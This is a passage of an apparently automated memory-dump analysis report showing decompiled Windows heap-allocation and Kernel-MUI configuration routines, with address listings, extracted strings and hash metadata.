                                                                                                                          								 *(_t182 - 0x29) = _t101;
                                                                                                                          								_t102 = _t101 & 0x000000ff;
                                                                                                                          							} else {
                                                                                                                          								_t130 = E009C1F5B(_t177);
                                                                                                                          								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                                                                                          								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                                                                                          								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                                                                                          									 *_t130 = 0;
                                                                                                                          								} else {
                                                                                                                          									_t131 = E009F16C7(1, _t173);
                                                                                                                          									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                                                                                          									 *_t165 = _t131;
                                                                                                                          									_t130 = _t165;
                                                                                                                          								}
                                                                                                                          								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                                                                                          							}
                                                                                                                          							 *(_t182 - 0x34) = _t102;
                                                                                                                          							 *(_t182 - 0x28) = _t102;
                                                                                                                          							__eflags =  *(_t181 + 0x4c);
                                                                                                                          							if( *(_t181 + 0x4c) != 0) {
                                                                                                                          								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                                                                                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                                          								__eflags =  *_t177;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                                                                                          							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                                                                                          								__eflags = 0;
                                                                                                                          								E00A84496(_t181, 0);
                                                                                                                          							}
                                                                                                                          							__eflags =  *(_t182 - 0x24) -  *0xab6360; // 0x0
                                                                                                                          							_t104 =  *[fs:0x30];
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t105 =  *(_t104 + 0x68);
                                                                                                                          								 *(_t182 - 0x4c) = _t105;
                                                                                                                          								__eflags = _t105 & 0x00000800;
                                                                                                                          								if((_t105 & 0x00000800) == 0) {
                                                                                                                          									goto L49;
                                                                                                                          								}
                                                                                                                          								_t106 =  *(_t182 - 0x34);
                                                                                                                          								__eflags = _t106;
                                                                                                                          								if(_t106 == 0) {
                                                                                                                          									goto L49;
                                                                                                                          								}
                                                                                                                          								__eflags = _t106 -  *0xab6364; // 0x0
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									goto L49;
                                                                                                                          								}
                                                                                                                          								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xab6366; // 0x0
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									goto L49;
                                                                                                                          								}
                                                                                                                          								_t108 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t108 + 0xc);
                                                                                                                          								if( *(_t108 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push(E00A6D455(_t181,  *(_t182 - 0x28)));
                                                                                                                          								_push( *(_t182 + 8));
                                                                                                                          								E009CB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                                                                                          								goto L34;
                                                                                                                          							} else {
                                                                                                                          								__eflags =  *(_t104 + 0xc);
                                                                                                                          								if( *(_t104 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push( *(_t182 + 8));
                                                                                                                          								E009CB150("Just allocated block at %p for %Ix bytes\n",  *0xab6360);
                                                                                                                          								L34:
                                                                                                                          								_t112 =  *[fs:0x30];
                                                                                                                          								__eflags =  *((char*)(_t112 + 2));
                                                                                                                          								if( *((char*)(_t112 + 2)) != 0) {
                                                                                                                          									 *0xab6378 = 1;
                                                                                                                          									 *0xab60c0 = 0;
                                                                                                                          									asm("int3");
                                                                                                                          									 *0xab6378 = 0;
                                                                                                                          								}
                                                                                                                          								goto L49;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t181 =  *0xab5708; // 0x0
                                                                                                                          					 *0xabb1e0(__ecx, __edx,  *(_t182 + 8));
                                                                                                                          					 *_t181();
                                                                                                                          					L50:
                                                                                                                          					return E00A1D130(0, _t177, _t181);
                                                                                                                          				}
                                                                                                                          			}





















                                                                                                                          0x00a82eb8
                                                                                                                          0x00a82ebd
                                                                                                                          0x00a82ec4
                                                                                                                          0x00a82ed6
                                                                                                                          0x00a82ec6
                                                                                                                          0x00a82ec7
                                                                                                                          0x00a82ecc
                                                                                                                          0x00a82ecf
                                                                                                                          0x00a82ed2
                                                                                                                          0x00a82ed2
                                                                                                                          0x00a82ed9
                                                                                                                          0x00a82ed9
                                                                                                                          0x00a82ee8
                                                                                                                          0x00a82eeb
                                                                                                                          0x00a82eef
                                                                                                                          0x00a82ef2
                                                                                                                          0x00a82efe
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f06
                                                                                                                          0x00a82f0d
                                                                                                                          0x00a82f0f
                                                                                                                          0x00a82f13
                                                                                                                          0x00a82f13
                                                                                                                          0x00a82f1b
                                                                                                                          0x00a82f21
                                                                                                                          0x00a82f27
                                                                                                                          0x00a82f95
                                                                                                                          0x00a82f98
                                                                                                                          0x00a82f9b
                                                                                                                          0x00a82fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fa6
                                                                                                                          0x00a82fa9
                                                                                                                          0x00a82fac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fb2
                                                                                                                          0x00a82fb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fc3
                                                                                                                          0x00a82fca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fd0
                                                                                                                          0x00a82fd6
                                                                                                                          0x00a82fd9
                                                                                                                          0x00a82ff8
                                                                                                                          0x00a82ffd
                                                                                                                          0x00a82fdb
                                                                                                                          0x00a82ff0
                                                                                                                          0x00a82ff5
                                                                                                                          0x00a8300e
                                                                                                                          0x00a8300f
                                                                                                                          0x00a8301a
                                                                                                                          0x00000000
                                                                                                                          0x00a82f29
                                                                                                                          0x00a82f29
                                                                                                                          0x00a82f2c
                                                                                                                          0x00a82f4b
                                                                                                                          0x00a82f50
                                                                                                                          0x00a82f2e
                                                                                                                          0x00a82f43
                                                                                                                          0x00a82f48
                                                                                                                          0x00a82f56
                                                                                                                          0x00a82f64
                                                                                                                          0x00a82f6c
                                                                                                                          0x00a82f6c
                                                                                                                          0x00a82f72
                                                                                                                          0x00a82f76
                                                                                                                          0x00a82f7c
                                                                                                                          0x00a82f83
                                                                                                                          0x00a82f89
                                                                                                                          0x00a82f8a
                                                                                                                          0x00a82f8a
                                                                                                                          0x00000000
                                                                                                                          0x00a82f76
                                                                                                                          0x00a82f27
                                                                                                                          0x00a82e6d
                                                                                                                          0x00a82da6
                                                                                                                          0x00a82dab
                                                                                                                          0x00a82db3
                                                                                                                          0x00a82db9
                                                                                                                          0x00a830bc
                                                                                                                          0x00a830c1
                                                                                                                          0x00a830c1

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                          • API String ID: 0-1745908468
                                                                                                                          • Opcode ID: fc01089aa23a8dbf6b64525c5ab60e13d7e44468cc8940275986ca045640e6d3
                                                                                                                          • Instruction ID: edaaedcd39b374d362830ad0f436b71752d3229e435384b036935ee939555faa
                                                                                                                          • Opcode Fuzzy Hash: fc01089aa23a8dbf6b64525c5ab60e13d7e44468cc8940275986ca045640e6d3
                                                                                                                          • Instruction Fuzzy Hash: 8191F231A006409FCB22EFA8C455BBDBBF2FF89B14F18805DE4465B2A2C7369D42CB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E009D3D34(signed int* __ecx) {
                                                                                                                          				signed int* _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int* _v16;
                                                                                                                          				signed int* _v20;
                                                                                                                          				char _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				char _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int* _v48;
                                                                                                                          				signed int* _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				char _v68;
                                                                                                                          				signed int _t140;
                                                                                                                          				signed int _t161;
                                                                                                                          				signed int* _t236;
                                                                                                                          				signed int* _t242;
                                                                                                                          				signed int* _t243;
                                                                                                                          				signed int* _t244;
                                                                                                                          				signed int* _t245;
                                                                                                                          				signed int _t255;
                                                                                                                          				void* _t257;
                                                                                                                          				signed int _t260;
                                                                                                                          				void* _t262;
                                                                                                                          				signed int _t264;
                                                                                                                          				void* _t267;
                                                                                                                          				signed int _t275;
                                                                                                                          				signed int* _t276;
                                                                                                                          				short* _t277;
                                                                                                                          				signed int* _t278;
                                                                                                                          				signed int* _t279;
                                                                                                                          				signed int* _t280;
                                                                                                                          				short* _t281;
                                                                                                                          				signed int* _t282;
                                                                                                                          				short* _t283;
                                                                                                                          				signed int* _t284;
                                                                                                                          				void* _t285;
                                                                                                                          
                                                                                                                          				_v60 = _v60 | 0xffffffff;
                                                                                                                          				_t280 = 0;
                                                                                                                          				_t242 = __ecx;
                                                                                                                          				_v52 = __ecx;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v56 = 0;
                                                                                                                          				_t275 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				if(__ecx == 0) {
                                                                                                                          					_t280 = 0xc000000d;
                                                                                                                          					_t140 = 0;
                                                                                                                          					L50:
                                                                                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                                                                                          					_t242[0x13] = _t140;
                                                                                                                          					_t242[0x16] = _v40;
                                                                                                                          					_t242[0x18] = _v28;
                                                                                                                          					_t242[0x14] = _v32;
                                                                                                                          					_t242[0x17] = _t275;
                                                                                                                          					_t242[0x15] = _v44;
                                                                                                                          					_t242[0x11] = _v56;
                                                                                                                          					_t242[0x12] = _v60;
                                                                                                                          					return _t280;
                                                                                                                          				}
                                                                                                                          				if(E009D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                          					_v56 = 1;
                                                                                                                          					if(_v8 != 0) {
                                                                                                                          						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                                          					}
                                                                                                                          					_v8 = _t280;
                                                                                                                          				}
                                                                                                                          				if(E009D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                          					_v60 =  *_v8;
                                                                                                                          					L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                                          					_v8 = _t280;
                                                                                                                          				}
                                                                                                                          				if(E009D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                          					L16:
                                                                                                                          					if(E009D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                          						L28:
                                                                                                                          						if(E009D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                          							L46:
                                                                                                                          							_t275 = _v16;
                                                                                                                          							L47:
                                                                                                                          							_t161 = 0;
                                                                                                                          							L48:
                                                                                                                          							if(_v8 != 0) {
                                                                                                                          								L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                                          							}
                                                                                                                          							_t140 = _v20;
                                                                                                                          							if(_t140 != 0) {
                                                                                                                          								if(_t275 != 0) {
                                                                                                                          									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                                          									_t275 = 0;
                                                                                                                          									_v28 = 0;
                                                                                                                          									_t140 = _v20;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							goto L50;
                                                                                                                          						}
                                                                                                                          						_t167 = _v12;
                                                                                                                          						_t255 = _v12 + 4;
                                                                                                                          						_v44 = _t255;
                                                                                                                          						if(_t255 == 0) {
                                                                                                                          							_t276 = _t280;
                                                                                                                          							_v32 = _t280;
                                                                                                                          						} else {
                                                                                                                          							_t276 = L009E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                                          							_t167 = _v12;
                                                                                                                          							_v32 = _t276;
                                                                                                                          						}
                                                                                                                          						if(_t276 == 0) {
                                                                                                                          							_v44 = _t280;
                                                                                                                          							_t280 = 0xc0000017;
                                                                                                                          							goto L46;
                                                                                                                          						} else {
                                                                                                                          							E00A0F3E0(_t276, _v8, _t167);
                                                                                                                          							_v48 = _t276;
                                                                                                                          							_t277 = E00A11370(_t276, 0x9a4e90);
                                                                                                                          							_pop(_t257);
                                                                                                                          							if(_t277 == 0) {
                                                                                                                          								L38:
                                                                                                                          								_t170 = _v48;
                                                                                                                          								if( *_v48 != 0) {
                                                                                                                          									E00A0BB40(0,  &_v68, _t170);
                                                                                                                          									if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          										_t280 =  &(_t280[0]);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								if(_t280 == 0) {
                                                                                                                          									_t280 = 0;
                                                                                                                          									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                                          									_v44 = 0;
                                                                                                                          									_v32 = 0;
                                                                                                                          								} else {
                                                                                                                          									_t280 = 0;
                                                                                                                          								}
                                                                                                                          								_t174 = _v8;
                                                                                                                          								if(_v8 != 0) {
                                                                                                                          									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                                          								}
                                                                                                                          								_v8 = _t280;
                                                                                                                          								goto L46;
                                                                                                                          							}
                                                                                                                          							_t243 = _v48;
                                                                                                                          							do {
                                                                                                                          								 *_t277 = 0;
                                                                                                                          								_t278 = _t277 + 2;
                                                                                                                          								E00A0BB40(_t257,  &_v68, _t243);
                                                                                                                          								if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          									_t280 =  &(_t280[0]);
                                                                                                                          								}
                                                                                                                          								_t243 = _t278;
                                                                                                                          								_t277 = E00A11370(_t278, 0x9a4e90);
                                                                                                                          								_pop(_t257);
                                                                                                                          							} while (_t277 != 0);
                                                                                                                          							_v48 = _t243;
                                                                                                                          							_t242 = _v52;
                                                                                                                          							goto L38;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t191 = _v12;
                                                                                                                          					_t260 = _v12 + 4;
                                                                                                                          					_v28 = _t260;
                                                                                                                          					if(_t260 == 0) {
                                                                                                                          						_t275 = _t280;
                                                                                                                          						_v16 = _t280;
                                                                                                                          					} else {
                                                                                                                          						_t275 = L009E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                                          						_t191 = _v12;
                                                                                                                          						_v16 = _t275;
                                                                                                                          					}
                                                                                                                          					if(_t275 == 0) {
                                                                                                                          						_v28 = _t280;
                                                                                                                          						_t280 = 0xc0000017;
                                                                                                                          						goto L47;
                                                                                                                          					} else {
                                                                                                                          						E00A0F3E0(_t275, _v8, _t191);
                                                                                                                          						_t285 = _t285 + 0xc;
                                                                                                                          						_v48 = _t275;
                                                                                                                          						_t279 = _t280;
                                                                                                                          						_t281 = E00A11370(_v16, 0x9a4e90);
                                                                                                                          						_pop(_t262);
                                                                                                                          						if(_t281 != 0) {
                                                                                                                          							_t244 = _v48;
                                                                                                                          							do {
                                                                                                                          								 *_t281 = 0;
                                                                                                                          								_t282 = _t281 + 2;
                                                                                                                          								E00A0BB40(_t262,  &_v68, _t244);
                                                                                                                          								if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          									_t279 =  &(_t279[0]);
                                                                                                                          								}
                                                                                                                          								_t244 = _t282;
                                                                                                                          								_t281 = E00A11370(_t282, 0x9a4e90);
                                                                                                                          								_pop(_t262);
                                                                                                                          							} while (_t281 != 0);
                                                                                                                          							_v48 = _t244;
                                                                                                                          							_t242 = _v52;
                                                                                                                          						}
                                                                                                                          						_t201 = _v48;
                                                                                                                          						_t280 = 0;
                                                                                                                          						if( *_v48 != 0) {
                                                                                                                          							E00A0BB40(_t262,  &_v68, _t201);
                                                                                                                          							if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          								_t279 =  &(_t279[0]);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t279 == 0) {
                                                                                                                          							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                                          							_v28 = _t280;
                                                                                                                          							_v16 = _t280;
                                                                                                                          						}
                                                                                                                          						_t202 = _v8;
                                                                                                                          						if(_v8 != 0) {
                                                                                                                          							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                                          						}
                                                                                                                          						_v8 = _t280;
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t214 = _v12;
                                                                                                                          				_t264 = _v12 + 4;
                                                                                                                          				_v40 = _t264;
                                                                                                                          				if(_t264 == 0) {
                                                                                                                          					_v20 = _t280;
                                                                                                                          				} else {
                                                                                                                          					_t236 = L009E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                                          					_t280 = _t236;
                                                                                                                          					_v20 = _t236;
                                                                                                                          					_t214 = _v12;
                                                                                                                          				}
                                                                                                                          				if(_t280 == 0) {
                                                                                                                          					_t161 = 0;
                                                                                                                          					_t280 = 0xc0000017;
                                                                                                                          					_v40 = 0;
                                                                                                                          					goto L48;
                                                                                                                          				} else {
                                                                                                                          					E00A0F3E0(_t280, _v8, _t214);
                                                                                                                          					_t285 = _t285 + 0xc;
                                                                                                                          					_v48 = _t280;
                                                                                                                          					_t283 = E00A11370(_t280, 0x9a4e90);
                                                                                                                          					_pop(_t267);
                                                                                                                          					if(_t283 != 0) {
                                                                                                                          						_t245 = _v48;
                                                                                                                          						do {
                                                                                                                          							 *_t283 = 0;
                                                                                                                          							_t284 = _t283 + 2;
                                                                                                                          							E00A0BB40(_t267,  &_v68, _t245);
                                                                                                                          							if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          								_t275 = _t275 + 1;
                                                                                                                          							}
                                                                                                                          							_t245 = _t284;
                                                                                                                          							_t283 = E00A11370(_t284, 0x9a4e90);
                                                                                                                          							_pop(_t267);
                                                                                                                          						} while (_t283 != 0);
                                                                                                                          						_v48 = _t245;
                                                                                                                          						_t242 = _v52;
                                                                                                                          					}
                                                                                                                          					_t224 = _v48;
                                                                                                                          					_t280 = 0;
                                                                                                                          					if( *_v48 != 0) {
                                                                                                                          						E00A0BB40(_t267,  &_v68, _t224);
                                                                                                                          						if(L009D43C0( &_v68,  &_v24) != 0) {
                                                                                                                          							_t275 = _t275 + 1;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t275 == 0) {
                                                                                                                          						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                                          						_v40 = _t280;
                                                                                                                          						_v20 = _t280;
                                                                                                                          					}
                                                                                                                          					_t225 = _v8;
                                                                                                                          					if(_v8 != 0) {
                                                                                                                          						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                                          					}
                                                                                                                          					_v8 = _t280;
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x009d407f
                                                                                                                          0x009d3f8a
                                                                                                                          0x009d3f8d
                                                                                                                          0x009d3f90
                                                                                                                          0x009d3f95
                                                                                                                          0x00a2830d
                                                                                                                          0x00a2830f
                                                                                                                          0x009d3f9b
                                                                                                                          0x009d3fac
                                                                                                                          0x009d3fae
                                                                                                                          0x009d3fb1
                                                                                                                          0x009d3fb1
                                                                                                                          0x009d3fb6
                                                                                                                          0x00a28317
                                                                                                                          0x00a2831a
                                                                                                                          0x00000000
                                                                                                                          0x009d3fbc
                                                                                                                          0x009d3fc1
                                                                                                                          0x009d3fc9
                                                                                                                          0x009d3fd7
                                                                                                                          0x009d3fda
                                                                                                                          0x009d3fdd
                                                                                                                          0x009d4021
                                                                                                                          0x009d4021
                                                                                                                          0x009d4029
                                                                                                                          0x009d4030
                                                                                                                          0x009d4044
                                                                                                                          0x009d4046
                                                                                                                          0x009d4046
                                                                                                                          0x009d4044
                                                                                                                          0x009d4049
                                                                                                                          0x00a28327
                                                                                                                          0x00a28334
                                                                                                                          0x00a28339
                                                                                                                          0x00a2833c
                                                                                                                          0x009d404f
                                                                                                                          0x009d404f
                                                                                                                          0x009d404f
                                                                                                                          0x009d4051
                                                                                                                          0x009d4056
                                                                                                                          0x009d4063
                                                                                                                          0x009d4063
                                                                                                                          0x009d4068
                                                                                                                          0x00000000
                                                                                                                          0x009d4068
                                                                                                                          0x009d3fdf
                                                                                                                          0x009d3fe2
                                                                                                                          0x009d3fe4
                                                                                                                          0x009d3fe7
                                                                                                                          0x009d3fef
                                                                                                                          0x009d4003
                                                                                                                          0x009d4005
                                                                                                                          0x009d4005
                                                                                                                          0x009d400c
                                                                                                                          0x009d4013
                                                                                                                          0x009d4016
                                                                                                                          0x009d4017
                                                                                                                          0x009d401b
                                                                                                                          0x009d401e
                                                                                                                          0x00000000
                                                                                                                          0x009d401e
                                                                                                                          0x009d3fb6
                                                                                                                          0x009d3eb1
                                                                                                                          0x009d3eb4
                                                                                                                          0x009d3eb7
                                                                                                                          0x009d3ebc
                                                                                                                          0x00a282a9
                                                                                                                          0x00a282ab
                                                                                                                          0x009d3ec2
                                                                                                                          0x009d3ed3
                                                                                                                          0x009d3ed5
                                                                                                                          0x009d3ed8
                                                                                                                          0x009d3ed8
                                                                                                                          0x009d3edd
                                                                                                                          0x00a282b3
                                                                                                                          0x00a282b6
                                                                                                                          0x00000000
                                                                                                                          0x009d3ee3
                                                                                                                          0x009d3ee8
                                                                                                                          0x009d3eed
                                                                                                                          0x009d3ef0
                                                                                                                          0x009d3ef3
                                                                                                                          0x009d3f02
                                                                                                                          0x009d3f05
                                                                                                                          0x009d3f08
                                                                                                                          0x00a282c0
                                                                                                                          0x00a282c3
                                                                                                                          0x00a282c5
                                                                                                                          0x00a282c8
                                                                                                                          0x00a282d0
                                                                                                                          0x00a282e4
                                                                                                                          0x00a282e6
                                                                                                                          0x00a282e6
                                                                                                                          0x00a282ed
                                                                                                                          0x00a282f4
                                                                                                                          0x00a282f7
                                                                                                                          0x00a282f8
                                                                                                                          0x00a282fc
                                                                                                                          0x00a282ff
                                                                                                                          0x00a282ff
                                                                                                                          0x009d3f0e
                                                                                                                          0x009d3f11
                                                                                                                          0x009d3f16
                                                                                                                          0x009d3f1d
                                                                                                                          0x009d3f31
                                                                                                                          0x00a28307
                                                                                                                          0x00a28307
                                                                                                                          0x009d3f31
                                                                                                                          0x009d3f39
                                                                                                                          0x009d3f48
                                                                                                                          0x009d3f4d
                                                                                                                          0x009d3f50
                                                                                                                          0x009d3f50
                                                                                                                          0x009d3f53
                                                                                                                          0x009d3f58
                                                                                                                          0x009d3f65
                                                                                                                          0x009d3f65
                                                                                                                          0x009d3f6a
                                                                                                                          0x00000000
                                                                                                                          0x009d3f6a
                                                                                                                          0x009d3edd
                                                                                                                          0x009d3dda
                                                                                                                          0x009d3ddd
                                                                                                                          0x009d3de0
                                                                                                                          0x009d3de5
                                                                                                                          0x00a28245
                                                                                                                          0x009d3deb
                                                                                                                          0x009d3df7
                                                                                                                          0x009d3dfc
                                                                                                                          0x009d3dfe
                                                                                                                          0x009d3e01
                                                                                                                          0x009d3e01
                                                                                                                          0x009d3e06
                                                                                                                          0x00a2824d
                                                                                                                          0x00a2824f
                                                                                                                          0x00a28254
                                                                                                                          0x00000000
                                                                                                                          0x009d3e0c
                                                                                                                          0x009d3e11
                                                                                                                          0x009d3e16
                                                                                                                          0x009d3e19
                                                                                                                          0x009d3e29
                                                                                                                          0x009d3e2c
                                                                                                                          0x009d3e2f
                                                                                                                          0x00a2825c
                                                                                                                          0x00a2825f
                                                                                                                          0x00a28261
                                                                                                                          0x00a28264
                                                                                                                          0x00a2826c
                                                                                                                          0x00a28280
                                                                                                                          0x00a28282
                                                                                                                          0x00a28282
                                                                                                                          0x00a28289
                                                                                                                          0x00a28290
                                                                                                                          0x00a28293
                                                                                                                          0x00a28294
                                                                                                                          0x00a28298
                                                                                                                          0x00a2829b
                                                                                                                          0x00a2829b
                                                                                                                          0x009d3e35
                                                                                                                          0x009d3e38
                                                                                                                          0x009d3e3d
                                                                                                                          0x009d3e44
                                                                                                                          0x009d3e58
                                                                                                                          0x00a282a3
                                                                                                                          0x00a282a3
                                                                                                                          0x009d3e58
                                                                                                                          0x009d3e60
                                                                                                                          0x009d3e6f
                                                                                                                          0x009d3e74
                                                                                                                          0x009d3e77
                                                                                                                          0x009d3e77
                                                                                                                          0x009d3e7a
                                                                                                                          0x009d3e7f
                                                                                                                          0x009d3e8c
                                                                                                                          0x009d3e8c
                                                                                                                          0x009d3e91
                                                                                                                          0x00000000
                                                                                                                          0x009d3e91

                                                                                                                          Strings
                                                                                                                          • WindowsExcludedProcs, xrefs: 009D3D6F
                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 009D3D8C
                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 009D3F70
                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 009D3DC0
                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 009D3E97
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                          • API String ID: 0-258546922
                                                                                                                          • Opcode ID: f0197bb7a1460aca753b0bb4524f06f74a54175acd24a476d5921b3245cd0a33
                                                                                                                          • Instruction ID: 00a05221b860dd53ea93763aeb078f4e9986f6fab8d7f4603dae8e04a5911f9e
                                                                                                                          • Opcode Fuzzy Hash: f0197bb7a1460aca753b0bb4524f06f74a54175acd24a476d5921b3245cd0a33
                                                                                                                          • Instruction Fuzzy Hash: D9F14A72D41228EFCB15DF98D980AEEBBB9FF48750F14846AF905A7251D7749E00CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 29%
                                                                                                                          			E009C40E1(void* __edx) {
                                                                                                                          				void* _t19;
                                                                                                                          				void* _t29;
                                                                                                                          
                                                                                                                          				_t28 = _t19;
                                                                                                                          				_t29 = __edx;
                                                                                                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push("HEAP: ");
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					E009CB150("Invalid heap signature for heap at %p", _t28);
                                                                                                                          					if(_t29 != 0) {
                                                                                                                          						E009CB150(", passed to %s", _t29);
                                                                                                                          					}
                                                                                                                          					_push("\n");
                                                                                                                          					E009CB150();
                                                                                                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                          						 *0xab6378 = 1;
                                                                                                                          						asm("int3");
                                                                                                                          						 *0xab6378 = 0;
                                                                                                                          					}
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return 1;
                                                                                                                          			}






                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                          • API String ID: 0-188067316
                                                                                                                          • Opcode ID: d7419a8f586a7bd8b2167a6e724f5880a99bfabc142d29078c8fd40422471ef7
                                                                                                                          • Instruction ID: 383352fa4e588c9e3d34484868759c9ba94172df09b2a70c4473892b5aa5cf09
                                                                                                                          • Opcode Fuzzy Hash: d7419a8f586a7bd8b2167a6e724f5880a99bfabc142d29078c8fd40422471ef7
